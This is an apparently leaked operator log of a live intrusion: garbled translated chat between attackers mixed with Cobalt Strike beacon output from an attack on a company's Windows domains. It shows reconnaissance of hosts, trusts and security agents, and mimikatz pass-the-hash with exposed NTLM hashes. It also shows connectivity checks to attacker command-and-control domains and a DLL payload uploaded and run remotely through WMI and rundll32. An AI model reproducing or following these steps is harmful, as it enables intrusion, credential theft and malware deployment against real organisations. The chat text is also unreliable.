>dNSHostName: USHDC1-CSPSPH02.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-CSPSPH02.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-CSPSPH02
>servicePrincipalName: WSMAN/USHDC1-CSPSPH02.datacenter.local
>servicePrincipalName: WSMAN/USHDC1-CSPSPH02
>servicePrincipalName: TERMSRV/USHDC1-CSPSPH02
>servicePrincipalName: TERMSRV/USHDC1-CSPSPH02.datacenter.local
>servicePrincipalName: RestrictedKrbHost/USHDC1-CSPSPH02
>servicePrincipalName: HOST/USHDC1-CSPSPH02
>servicePrincipalName: RestrictedKrbHost/USHDC1-CSPSPH02.datacenter.local
>servicePrincipalName: HOST/USHDC1-CSPSPH02.datacenter.local
``Everything* throw full hostnames with groupsMH would give you a better idea of what to do:
FPS
MGW
ARP
SCM
SEC
SPH
?```
	USHDC1-360MX2.datacenter.local
	USHDC1-360MX1.datacenter.local
```
These are in the exchanger, right?
look for access to his console...as file server ``.
Image Name PID Session Name Session# Mem Usage User Name CPU Time
========================= ======== ================ =========== ============ ================================================== ============
System Idle Process 0 Services 0 4 K NT AUTHORITY\SYSTEM 827:32:16
System 4 Services 0 264 K N/A 5:43:18
smss.exe 224 Services 0 1,036 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 340 Services 0 3,964 K NT AUTHORITY\SYSTEM 0:00:25
csrss.exe 396 Console 1 3,472 K NT AUTHORITY\SYSTEM 0:00:00
wininit.exe 404 Services 0 3,896 K NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 448 Console 1 5,900 K NT AUTHORITY\SYSTEM 0:00:00
services.exe 492 Services 0 10,908 K NT AUTHORITY\SYSTEM 0:52:07
lsass.exe 500 Services 0 17,576 K NT AUTHORITY\SYSTEM 0:06:28
svchost.exe 560 Services 0 9,644 K NT AUTHORITY\SYSTEM 0:01:19
svchost.exe 592 Services 0 9,244 K NT AUTHORITY\NETWORK SERVICE 0:03:50
LogonUI.exe 688 Console 1 27,424 K NT AUTHORITY\SYSTEM 0:00:00
MsMpEng.exe 700 Services 0 243,516 K NT AUTHORITY\SYSTEM 2:25:24
dwm.exe 712 Console 1 30,044 K Window Manager\DWM-1 0:00:00
svchost.exe 816 Services 0 15,376 K NT AUTHORITY\LOCAL SERVICE 0:08:36
svchost.exe 844 Services 0 15,452 K NT AUTHORITY\SYSTEM 0:00:36
svchost.exe 860 Services 0 86,460 K NT AUTHORITY\SYSTEM 1:19:39
svchost.exe 912 Services 0 12,748 K NT AUTHORITY\LOCAL SERVICE 0:00:25
svchost.exe 992 Services 0 21,736 K NT AUTHORITY/NETWORK SERVICE 0:05:02
svchost.exe 532 Services 0 11,000 K NT AUTHORITY\LOCAL SERVICE 0:00:29
spoolsv.exe 1108 Services 0 13,520 K NT AUTHORITY\SYSTEM 0:00:13
svchost.exe 1148 Services 0 7,856 K NT AUTHORITY\SYSTEM 0:00:05
ir_agent.exe 1172 Services 0 13,176 K NT AUTHORITY\SYSTEM 0:01:04
conhost.exe 1292 Services 0 3,016 K NT AUTHORITY\SYSTEM 0:00:02
snmp.exe 1304 Services 0 6,856 K NT AUTHORITY\SYSTEM 0:03:05
svchost.exe 1336 Services 0 13,584 K NT AUTHORITY\SYSTEM 0:00:59
vmtoolsd.exe 1352 Services 0 13,800 K NT AUTHORITY\SYSTEM 0:09:42
ir_agent.exe 1372 Services 0 63,968 K NT AUTHORITY\SYSTEM 1:09:54
WmiApSrv.exe 1460 Services 0 8,472 K NT AUTHORITY\SYSTEM 0:01:01
wmi_exporter.exe 1484 Services 0 16,032 K NT AUTHORITY\SYSTEM 0:00:32
WmiPrvSE.exe 1624 Services 0 23,088 K NT AUTHORITY\NETWORK SERVICE 1:55:27
WmiPrvSE.exe 1640 Services 0 48,744 K NT AUTHORITY\SYSTEM 0:31:54
svchost.exe 1908 Services 0 8,936 K NT AUTHORITY\NETWORK SERVICE 0:00:31
svchost.exe 2012 Services 0 4,792 K NT AUTHORITY\NETWORK SERVICE 0:00:02
dllhost.exe 2132 Services 0 11,008 K NT AUTHORITY\SYSTEM 0:00:04
msdtc.exe 2484 Services 0 7,336 K NT AUTHORITY\NETWORK SERVICE 0:00:04
WmiPrvSE.exe 2572 Services 0 29,720 K NT AUTHORITY\SYSTEM 0:19:40
CcmExec.exe 3696 Services 0 113,032 K NT AUTHORITY\SYSTEM 0:11:09
WmiPrvSE.exe 3804 Services 0 13,636 K NT AUTHORITY\SYSTEM 0:00:37
ir_agent.exe 3964 Services 0 92,692 K NT AUTHORITY\SYSTEM 0:40:51
ir_agent.exe 3972 Services 0 63,404 K NT AUTHORITY\SYSTEM 0:25:50
ir_agent.exe 4016 Services 0 47,476 K NT AUTHORITY\SYSTEM 0:06:02
CmRcService.exe 1648 Services 0 8,784 K NT AUTHORITY\SYSTEM 0:00:14
WmiPrvSE.exe 3320 Services 0 6,708 K NT AUTHORITY\LOCAL SERVICE 0:00:01
WmiPrvSE.exe 3048 Services 0 10,388 K NT AUTHORITY\LOCAL SERVICE 0:02:01
ir_agent.exe 2832 Services 0 55,420 K NT AUTHORITY\SYSTEM 0:06:02
ir_agent.exe 2392 Services 0 51,596 K NT AUTHORITY\SYSTEM 0:26:38
xagt.exe 3944 Services 0 7,272 K NT AUTHORITY\SYSTEM 0:00:02
WmiPrvSE.exe 3280 Services 0 8,820 K NT AUTHORITY\LOCAL SERVICE 0:00:00
WmiPrvSE.exe 3600 Services 0 8,176 K NT AUTHORITY\SYSTEM 0:00:00
WmiPrvSE.exe 3396 Services 0 12,148 K NT AUTHORITY\SYSTEM 0:00:00
msiexec.exe 2712 Services 0 5,868 K NT AUTHORITY\SYSTEM 0:00:00

``Let me see the pids please very...DC - pointer to domain controller
FS - indication of a file server
360 - reference to the exechange in general, more precisely to the CCO authorization through the office360 this machine has one interface? dk in spn ldap, and in the oushka should not be written? )this is the domain controller....``.
CN=USHDC1-360FS1,OU=Production,OU=C360,OU=Servers,OU=0.SAI Global,DC=datacenter,DC=local

>dNSHostName: USHDC1-360FS1.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-360FS1.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-360FS1
>servicePrincipalName: WSMAN/USHDC1-360FS1.datacenter.local
>servicePrincipalName: WSMAN/USHDC1-360FS1
>servicePrincipalName: TERMSRV/USHDC1-360FS1
>servicePrincipalName: TERMSRV/USHDC1-360FS1.datacenter.local
>servicePrincipalName: RestrictedKrbHost/USHDC1-360FS1
>servicePrincipalName: HOST/USHDC1-360FS1
>servicePrincipalName: RestrictedKrbHost/USHDC1-360FS1.datacenter.local
>servicePrincipalName: HOST/USHDC1-360FS1.datacenter.local
``Well, I guess...
what is the host's name and what is its OU/group?
Name

Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40660

Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219

Microsoft Visual C++ 2005 Redistributable (x64)

VMware Tools

Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.60610

Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.60610

Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40660

Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.60610

Windows Firewall Configuration Provider

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161

Microsoft Forefront Endpoint Protection 2010 Server Management

FireEye Endpoint Agent

Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40660

Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.60610

Configuration Manager Client

Microsoft RichCopy 4.0

Microsoft Endpoint Protection Management Components

Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40660

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148

Windows Resource Kit Tools - SubInAcl.exe

Microsoft Silverlight

Microsoft Security Client

Microsoft Policy Platform

WMI Exporter

Rapid7 Insight Agent
``It also worked out``.
shell wmic /node:10.225.10.202 product get name
``It's not working under the token. Try wmic.
maybe the port is closed...under the token?
beacon> shell tasklist /s 10.225.10.202 /v
[*] Tasked beacon to run: tasklist /s 10.225.10.202 /v
[+] host called home, sent: 59 bytes
``Aha last time I didn't have time to query the tasklists, all that's left is the ones below and the "directory of servers" by assignment[ ](https://mediaeveryone.com/group/saiglobal-com?msg=foqLBWJKz6u69XSe4) 1
dn:CN=saig.frd.global,CN=System,DC=datacenter,DC=local
>whenCreated: 2018/06/09-00:59:39 AUS Eastern Daylight Time
>name: saig.frd.global
>securityIdentifier: S-1-5-21-2959458370-3657645319-1944215935
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: saig.frd.global
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=frd.global,CN=System,DC=datacenter,DC=local
>whenCreated: 2018/04/14-00:59:25 AUS Eastern Daylight Time
>name: frd.global
>securityIdentifier: S-1-5-21-2724714270-1340506477-316473475
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: frd.global
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]
>trustPartner: 8 [UpLevel(2)] >trustPartner: 8:
AdFind
DA
EA
LA
DC
DCSync-trusts are all removed? Now I'm looking for the AV and Nas, right? Yes) finally, after a thousand years, I'm in the datacenter)) dalka that on my kobulyat```
beacon> pth datacenter.local\Administrator c49d5b83342b859132197d0a73592c0e
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:Administrator /domain:datacenter.local /ntlm:c49d5b83342b859132197d0a73592c0e /run:"%COMSPEC% /c echo d8c5e886568 > \.\pipe\da5531" command
[+] host called home, sent: 438886 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user : administrator
domain : datacenter.local
program : C:\Windows\system32\cmd.exe /c echo d8c5e886568 > \\.\pipe\da5531
impers. : no
NTLM : c49d5b83342b859132197d0a73592c0e
  | PID 6988
  | TID 4548
  | LSA Process is now R/W
  | LUID 0 ; 1615963531 (00000000:6051a58b)
  \_ msv1_0 - data copy @ 0000006D65B9E580 : OK !
  \kerberos - data copy @ 0000006D6776F5E8
   \_ aes256_hmac -> null
   \_ aes128_hmac -> null
   \_ rc4_hmac_nt OK
   \_ rc4_hmac_old OK
   \_ rc4_md4 OK
   \des_cbc_md5 -> null
   \_ des_cbc_crc -> null
   \_ rc4_hmac_nt_exp OK
   \_ rc4_hmac_old_exp OK
   \_ *Password replace @ 0000006D65B7B1A8 (16) -> null

beacon> shell wmic /node:10.225.10.201 process call create "cmd /c ping stormname.com > C:\ProgramData\p.txt"
[*] Tasked beacon to run: wmic /node:10.225.10.201 process call create "cmd /c ping stormname.com > C:\ProgramData\p.txt"
[+] host called home, sent: 126 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 3312;
	ReturnValue = 0;
};


beacon> shell type \10.225.10.201\C$\ProgramData\p.txt
[*] Tasked beacon to run: type \\10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 72 bytes
[+] received output:

Pinging stormname.com [104.200.67.11] with 32 bytes of data:
Reply from 104.200.67.11: bytes=32 time=51ms TTL=55
Reply from 104.200.67.11: bytes=32 time=51ms TTL=55
Reply from 104.200.67.11: bytes=32 time=51ms TTL=55
Reply from 104.200.67.11: bytes=32 time=51ms TTL=55

Ping statistics for 104.200.67.11:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 51ms, Maximum = 51ms, Average = 51ms

beacon> rm \\10.225.10.201\C$\ProgramData\p.txt
[*] Tasked beacon to remove \10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 44 bytes
beacon> upload /home/user/Desktop/cobalt/dll_maker/x64.dll
[*] Tasked beacon to upload /home/user/Desktop/cobalt/dll_maker/x64.dll as x64.dll
[+] host called home, sent: 139699 bytes
beacon> shell copy x64.dll \10.225.10.201\C$\ProgramData\
[*] Tasked beacon to run: copy x64.dll \\\10.225.10.201\$\ProgramData\
[+] host called home, sent: 75 bytes
[+] received output:
        1 file(s) copied.

beacon> shell wmic /node:10.225.10.201 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[*] Tasked beacon to run: wmic /node:10.225.10.201 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[+] host called home, sent: 120 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 4664;
	ReturnValue = 0;
};


beacon> shell dir \10.225.10.201\C$\ProgramData\x64.dll
[*] Tasked beacon to run: dir \\10.225.10.201\C$\ProgramData\x64.dll
[+] host called home, sent: 73 bytes
[+] received output:
 Volume in drive \10.225.10.201$ has no label.
 Volume Serial Number is 2AC9-2F68

 Directory of \10.225.10.201\C$\ProgramData

File Not Found

``Trying from the coba @user3
also not attracted, although the coba pings:^(why he sees everyone, he doesn't see me ``
user 2-2[AUHDC1-COPADS01]SYSTEM */5008|2020Oct07 23:48:21> shell wmic /node:10.225.10.201 process call create "cmd /c ping passloft.com > C:\ProgramData\p.txt"
[*] Tasked beacon to run: wmic /node:10.225.10.201 process call create "cmd /c ping passloft.com > C:\ProgramData\p.txt"
[+] host called home, sent: 125 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 464;
	ReturnValue = 0;
};


[+] host called home, sent: 32 bytes
[+] host called home, sent: 32 bytes
user 2-2[AUHDC1-COPADS01]SYSTEM */5008|2020Oct07 23:49:20> shell type \\10.225.10.201\C$\ProgramData\p.txt
[*] Tasked beacon to run: type \\\10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 72 bytes
[+] received output:

Pinging passloft.com [192.169.7.15] with 32 bytes of data:
Reply from 192.169.7.15: bytes=32 time=52ms TTL=55
Reply from 192.169.7.15: bytes=32 time=51ms TTL=55
Reply from 192.169.7.15: bytes=32 time=52ms TTL=55
Reply from 192.169.7.15: bytes=32 time=52ms TTL=55

Ping statistics for 192.169.7.15:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 51ms, Maximum = 52ms, Average = 51ms

user 2-2[AUHDC1-COPADS01]SYSTEM */5008|2020Oct07 23:49:51> rm \\10.225.10.201\C$\ProgramData\p.txt
[*] Tasked beacon to remove \10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 44 bytes
``Dal, is it really not easier to just give a pass from your coba? do you want to deploy a listener to saiglobal.com?if he doesn't see my coba, what if he attracts it and then I get his coba to work?
beacon> shell type \10.225.10.201\C$\ProgramData\sq.txt
[*] Tasked beacon to run: type \\10.225.10.201\C$\ProgramData\sq.txt
[+] host called home, sent: 73 bytes
[+] received output:

Pinging firedi.com [23.106.215.146] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 23.106.215.146:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),

``You're trying to pull them in,`` pinging from there to your coba
beacon> shell ping firedi.com
[*] Tasked beacon to run: ping firedi.com
[+] host called home, sent: 46 bytes
[+] received output:

Pinging firedi.com [23.106.215.146] with 32 bytes of data:
Reply from 23.106.215.146: bytes=32 time=70ms TTL=54
Reply from 23.106.215.146: bytes=32 time=69ms TTL=54
Reply from 23.106.215.146: bytes=32 time=68ms TTL=54
Reply from 23.106.215.146: bytes=32 time=68ms TTL=54

Ping statistics for 23.106.215.146:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 68ms, Maximum = 70ms, Average = 68ms

``Try pinging your coba
beacon> pth datacenter.local\Administrator c49d5b83342b859132197d0a73592c0e
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:Administrator /domain:datacenter.local /ntlm:c49d5b83342b859132197d0a73592c0e /run:"%COMSPEC% /c echo a8192f714f5 > \.\pipe\da0134" command
[+] host called home, sent: 438886 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user : administrator
domain : datacenter.local
program : C:\Windows\system32\cmd.exe /c echo a8192f714f5 > \\.\pipe\da0134
impers. : no
NTLM : c49d5b83342b859132197d0a73592c0e
  | PID 6148
  | TID 4308
  | LSA Process is now R/W
  | LUID 0 ; 1594533110 (00000000:5f0aa4f6)
  \_ msv1_0 - data copy @ 0000006D664CBE00 : OK !
  \kerberos - data copy @ 0000006D665014C8
   \_ aes256_hmac -> null
   \_ aes128_hmac -> null
   \_ rc4_hmac_nt OK
   \_ rc4_hmac_old OK
   \_ rc4_md4 OK
   \des_cbc_md5 -> null
   \_ des_cbc_crc -> null
   \_ rc4_hmac_nt_exp OK
   \_ rc4_hmac_old_exp OK
   \_ *Password replace @ 0000006D664D0B18 (16) -> null

beacon> shell dir \\10.225.10.201\C$\ProgramData\
[*] Tasked beacon to run: dir \\\10.225.10.201\C$\ProgramData\
[+] host called home, sent: 66 bytes
[+] received output:
 Volume in drive \10.225.10.201$ has no label.
 Volume Serial Number is 2AC9-2F68

 Directory of \10.225.10.201\C$\ProgramData

07/16/2016 09:23 AM <DIR> Comms
10/06/2020 12:45 AM <DIR> FireEye
10/06/2020 08:24 AM 8,192 ntuser.dat
05/30/2019 02:57 PM <DIR> Package Cache
04/24/2019 03:13 PM <DIR> regid.1991-06.com.microsoft
07/16/2016 09:23 AM <DIR> SoftwareDistribution
02/02/2018 03:38 PM <DIR> USOPrivate
02/02/2018 03:38 PM <DIR> USOShared
03/13/2019 01:10 PM <DIR> VMware
               1 File(s) 8,192 bytes
               8 Dir(s) 61,425,848,320 bytes free

beacon> shell wmic /node:10.225.10.201 process call create "cmd /c ping google.com > C:\ProgramData\p.txt"
[*] Tasked beacon to run: wmic /node:10.225.10.201 process call create "cmd /c ping google.com > C:\ProgramData\p.txt"
[+] host called home, sent: 123 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 5972;
	ReturnValue = 0;
};


beacon> shell type \10.225.10.201\C$\ProgramData\p.txt
[*] Tasked beacon to run: type \\10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 72 bytes
[+] received output:

Pinging google.com [108.177.122.100] with 32 bytes of data:
Reply from 108.177.122.100: bytes=32 time=2ms TTL=106
Reply from 108.177.122.100: bytes=32 time=1ms TTL=106
Reply from 108.177.122.100: bytes=32 time=1ms TTL=106
Reply from 108.177.122.100: bytes=32 time=2ms TTL=106

Ping statistics for 108.177.122.100:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 1ms, Maximum = 2ms, Average = 1ms

beacon> rm \\10.225.10.201\C$\ProgramData\p.txt
[*] Tasked beacon to remove \10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 44 bytes
beacon> shell dir
[*] Tasked beacon to run: dir
[+] host called home, sent: 34 bytes
[+] received output:
 Volume in drive C is System
 Volume Serial Number is 9AA9-9DAB

 Directory of C:\ProgramData

07/27/2018 07:11 AM <DIR> AppData
10/06/2020 12:20 AM <DIR> FireEye
02/29/2020 03:37 PM <DIR> GetSupportService_N-Central
02/17/2020 02:15 PM <DIR> N-Able Technologies
10/07/2020 04:09 AM 262,144 ntuser.dat
08/23/2020 12:22 AM <DIR> Package Cache
11/21/2014 08:58 PM <DIR> regid.1991-06.com.microsoft
07/27/2018 07:11 AM <DIR> SnowSoftware
05/19/2020 01:19 PM <DIR> SolarWinds MSP
04/25/2020 12:00 AM <DIR> Tenable
07/25/2020 11:30 AM <DIR> VMware
10/07/2020 03:31 PM 139,680 x64.dll
               2 File(s) 401,824 bytes
              10 Dir(s) 24,960,004,096 bytes free

beacon> shell copy x64.dll \10.225.10.201\C$\ProgramData\
[*] Tasked beacon to run: copy x64.dll \\\10.225.10.201\C$\ProgramData\
[+] host called home, sent: 75 bytes
[+] received output:
        1 file(s) copied.

beacon> shell wmic /node:10.225.10.201 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[*] Tasked beacon to run: wmic /node:10.225.10.201 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[+] host called home, sent: 120 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 6624;
	ReturnValue = 0;
};


beacon> shell dir \10.225.10.201\C$\ProgramData\x64.dll
[*] Tasked beacon to run: dir \\10.225.10.201\C$\ProgramData\x64.dll
[+] host called home, sent: 73 bytes
[+] received output:
 Volume in drive \10.225.10.201$ has no label.
 Volume Serial Number is 2AC9-2F68

 Directory of \10.225.10.201\C$\ProgramData

File Not Found

```
no fucking way again vtoroyi dk trying the rest too? well 1 is not attracted to the datacenter not enough servers that[ ](https://mediaeveryone.com/group/saiglobal-com?msg=u28Sfxmtj3eQaJJTo) i pisalkaak razkredy i in synk and took on the datacenter delka did not worka stopam at all admins changed passes? here dsink from this domain, which last time climb did not come from the datacenter no credsSaigProd.local [10.195.100.1] you climb here?
datacenter.local [10.225.10.200]
``This is what you're talking about?
```
saig.frd.global [10.210.8.236]
datacenter.local [10.225.10.200]
frd.global [10.225.12.1]
saigProd.local [10.195.100.1]
c360.local [10.195.43.2]
legalco.local [10.195.23.1]
``Are the other servers closed too?
beacon> shell type \\\10.195.100.1\C$\ProgramData\p.txt
[*] Tasked beacon to run: type \\\10.195.100.1\C$\ProgramData\p.txt
[+] host called home, sent: 71 bytes
[+] received output:

Pinging google.com [216.58.196.142] with 32 bytes of data:
Reply from 216.58.196.142: bytes=32 time=2ms TTL=114
Reply from 216.58.196.142: bytes=32 time=2ms TTL=114
Reply from 216.58.196.142: bytes=32 time=2ms TTL=114
Reply from 216.58.196.142: bytes=32 time=2ms TTL=114

Ping statistics for 216.58.196.142:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 2ms, Maximum = 2ms, Average = 2ms.
``And in the file?
beacon> shell wmic /node:10.195.100.1 process call create "cmd /c ping google.com > C:\ProgramData\p.txt"
[*] Tasked beacon to run: wmic /node:10.195.100.1 process call create "cmd /c ping google.com > C:\ProgramData\p.txt"
[+] host called home, sent: 122 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 5772;
	ReturnValue = 0;
};


beacon> shell dir \\10.195.100.1\C$\ProgramData\p.txt
[*] Tasked beacon to run: dir \\10.195.100.1\C$\ProgramData\p.txt
[+] host called home, sent: 70 bytes
[+] received output:
 Volume in drive \10.195.100.1\C$ has no label.
 Volume Serial Number is B042-5E3A

 Directory of \10.195.100.1\C$\ProgramData

10/07/2020 03:38 PM 472 p.txt
               1 File(s) 472 bytes
               0 Dir(s) 63,656,124,416 bytes free

``You still haven't pinged google from there? Can it see the outside? xDsession is fuckin' gone again?
beacon> pth saigProd.local\svc.sccmcliinst aa9249f57aba289658fde8afe795fd67
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:svc.sccmcliinst /domain:SaigProd.local /ntlm:aa9249f57aba289658fde8afe795fd67 /run:"%COMSPEC% /c echo bc8a1c163ef > \.\pipe\ef7d36" command
[+] host called home, sent: 23 bytes
[+] host called home, sent: 438863 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user : svc.sccmcliinst
domain : saigProd.local
program : C:\Windows\system32\cmd.exe /c echo bc8a1c163ef > \.\pipe\ef7d36
impers. : no
NTLM : aa9249f57aba289658fde8afe795fd67
  | PID 5712
  | TID 4988
  | LSA Process is now R/W
  | LUID 0 ; 1593611577 (00000000:5efc9539)
  \_ msv1_0 - data copy @ 0000006D65BDB260 : OK !
  \kerberos - data copy @ 0000006D6776C4E8
   \_ aes256_hmac -> null
   \_ aes128_hmac -> null
   \_ rc4_hmac_nt OK
   \_ rc4_hmac_old OK
   \_ rc4_md4 OK
   \des_cbc_md5 -> null
   \_ des_cbc_crc -> null
   \_ rc4_hmac_nt_exp OK
   \_ rc4_hmac_old_exp OK
   \_ *Password replace @ 0000006D65B7ABC8 (16) -> null

beacon> ls \10.195.100.1\C$\ProgramData
[*] Tasked beacon to list files in \10.195.100.1\C$\ProgramData
[+] host called home, sent: 47 bytes
[*] Listing: \\10.195.100.1\C$\ProgramData\

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 08/22/2013 10:48:41 Application Data
          dir 08/22/2013 10:48:41 Desktop
          dir 08/22/2013 10:48:41 Documents
          dir 10/06/2020 00:44:16 FireEye
          dir 07/16/2020 08:54:26 Microsoft
          dir 07/25/2020 03:40:51 Package Cache
          dir 11/14/2013 02:16:11 regid.1991-06.com.microsoft
          dir 08/22/2013 10:48:41 Start Menu
          dir 08/22/2013 10:48:41 Templates
          dir 07/25/2020 03:41:11 VMware
 70kb fil 09/19/2020 21:56:17 ntuser.pol

beacon> pwd
[*] Tasked beacon to print working directory
[+] host called home, sent: 8 bytes
[*] Current directory is C:\Windows
beacon> cd C:\ProgramData
[*] cd C:\ProgramData
[+] host called home, sent: 22 bytes
beacon> upload /home/user/Desktop/cobalt/dll_maker/x64.dll
[*] Tasked beacon to upload /home/user/Desktop/cobalt/dll_maker/x64.dll as x64.dll
[+] host called home, sent: 139699 bytes
beacon> shell copy x64.dll \\10.195.100.1\C$\ProgramData
[*] Tasked beacon to run: copy x64.dll \\\10.195.100.1\C$\ProgramData
[+] host called home, sent: 73 bytes
[+] received output:
        1 file(s) copied.

beacon> shell dir \10.195.100.1\C$\ProgramData
[*] Tasked beacon to run: dir \\10.195.100.1\C$\ProgramData
[+] host called home, sent: 64 bytes
beacon> shell dir \\10.195.100.1\C$\ProgramData\x64.dll
[+] received output:
 Volume in drive \10.195.100.1\C$ has no label.
 Volume Serial Number is B042-5E3A

 Directory of \10.195.100.1\C$\ProgramData

10/06/2020 12:44 AM <DIR> FireEye
07/25/2020 03:40 AM <DIR> Package Cache
11/14/2013 03:16 AM <DIR> regid.1991-06.com.microsoft
07/25/2020 03:41 AM <DIR> VMware
10/07/2020 03:31 PM 139,680 x64.dll
               1 File(s) 139,680 bytes
               4 Dir(s) 63,656,927,232 bytes free

[*] Tasked beacon to run: dir \10.195.100.1\C$\ProgramData\x64.dll
[+] host called home, sent: 72 bytes
[+] received output:
 Volume in drive \10.195.100.1\C$ has no label.
 Volume Serial Number is B042-5E3A

 Directory of \10.195.100.1\C$\ProgramData

10/07/2020 03:31 PM 139,680 x64.dll
               1 File(s) 139,680 bytes
               0 Dir(s) 63,656,927,232 bytes free

beacon> shell wmic /node:10.195.100.1 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[*] Tasked beacon to run: wmic /node:10.195.100.1 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[+] host called home, sent: 119 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 5056;
	ReturnValue = 0;
};


beacon> shell dir \10.195.100.1\C$\ProgramData\x64.dll
[*] Tasked beacon to run: dir \\10.195.100.1\C$\ProgramData\x64.dll
[+] host called home, sent: 72 bytes
[+] received output:
 Volume in drive \10.195.100.1\C$ has no label.
 Volume Serial Number is B042-5E3A

 Directory of \10.195.100.1\C$\ProgramData

File Not Found

``this is a local reference because /node does not make sense if you are doing it on the dedicec within your own machine there is only AD I went to finish it for user4da you might as well ask if on the dedicec then why in general why /node ?why vmik to another host if on the dedicec - and cmd /c is not enough at the beginning@tl2 it's trying on the dedicecWhy should i do it on the dedicecwmik starts the process for a remote machine context and saves the result on it we waste time

ls \169.254.195.31\c$\ProgramData`1 more error, the path is already correct
beacon> shell wmic /node:169.254.195.31 process call create "ping google.com>C:\ProgramData\SOOQA.txt"
[*] Tasked beacon to run: wmic /node:169.254.195.31 process call create "ping google.com>C:\ProgramData\SOOQA.txt"
[+] host called home, sent: 119 bytes
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 1156;
	ReturnValue = 0;
};




 Directory of C:\ProgramData

09/28/2020 01:22 PM <DIR> Applications
10/05/2020 11:48 AM <DIR> Binary Fortress Software
10/02/2020 03:52 PM 25,604 cn-matches.txt
10/03/2020 04:18 PM 6,518 hostnames.txt
10/02/2020 03:37 PM 0 matches-share.txt
10/02/2020 05:37 PM 818,088,516 matches_sysvol.rar
09/23/2020 12:31 PM <DIR> Mozilla
10/07/2020 09:03 PM 482 output.txt
09/28/2020 02:11 PM <DIR> Package Cache
10/03/2020 04:18 PM 511 ping.bat
10/07/2020 07:01 PM <DIR> regid.1991-06.com.microsoft
10/03/2020 08:19 PM 18,878 result.txt
               7 File(s) 818,140,509 bytes
               5 Dir(s) 168,773,038,080 bytes free

``Actually, this pinging thing is kind of painful, should I pay attention to the ping?
beacon> shell wmic /node:169.254.195.31 process call create "ping google.com>C:\Windows\Temp\SOOQA.txt"
C:{\ProgramData
You're right about this bullshit. Sort it out I'll tell you again, you'll forget it even if you download the logs from the coba and there will be regular commands, write them down, remember it really fucks me up I haven't written many times about this error I won't tell you because it's been sorted out
beacon> shell wmic /node:169.254.195.31 process call create "ping google.com>C:\Windows\Temp\SOOQA.txt"
[*] Tasked beacon to run: wmic /node:169.254.195.31 process call create "ping google.com>C:\Windows\Temp\SOOQA.txt"
[+] host called home, sent: 120 bytes
beacon> shell dir
[*] Tasked beacon to run: dir
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 5764;
	ReturnValue = 0;
};


[+] host called home, sent: 34 bytes
[+] received output:
 Volume in drive C has no label.
 Volume Serial Number is 4C8B-2027

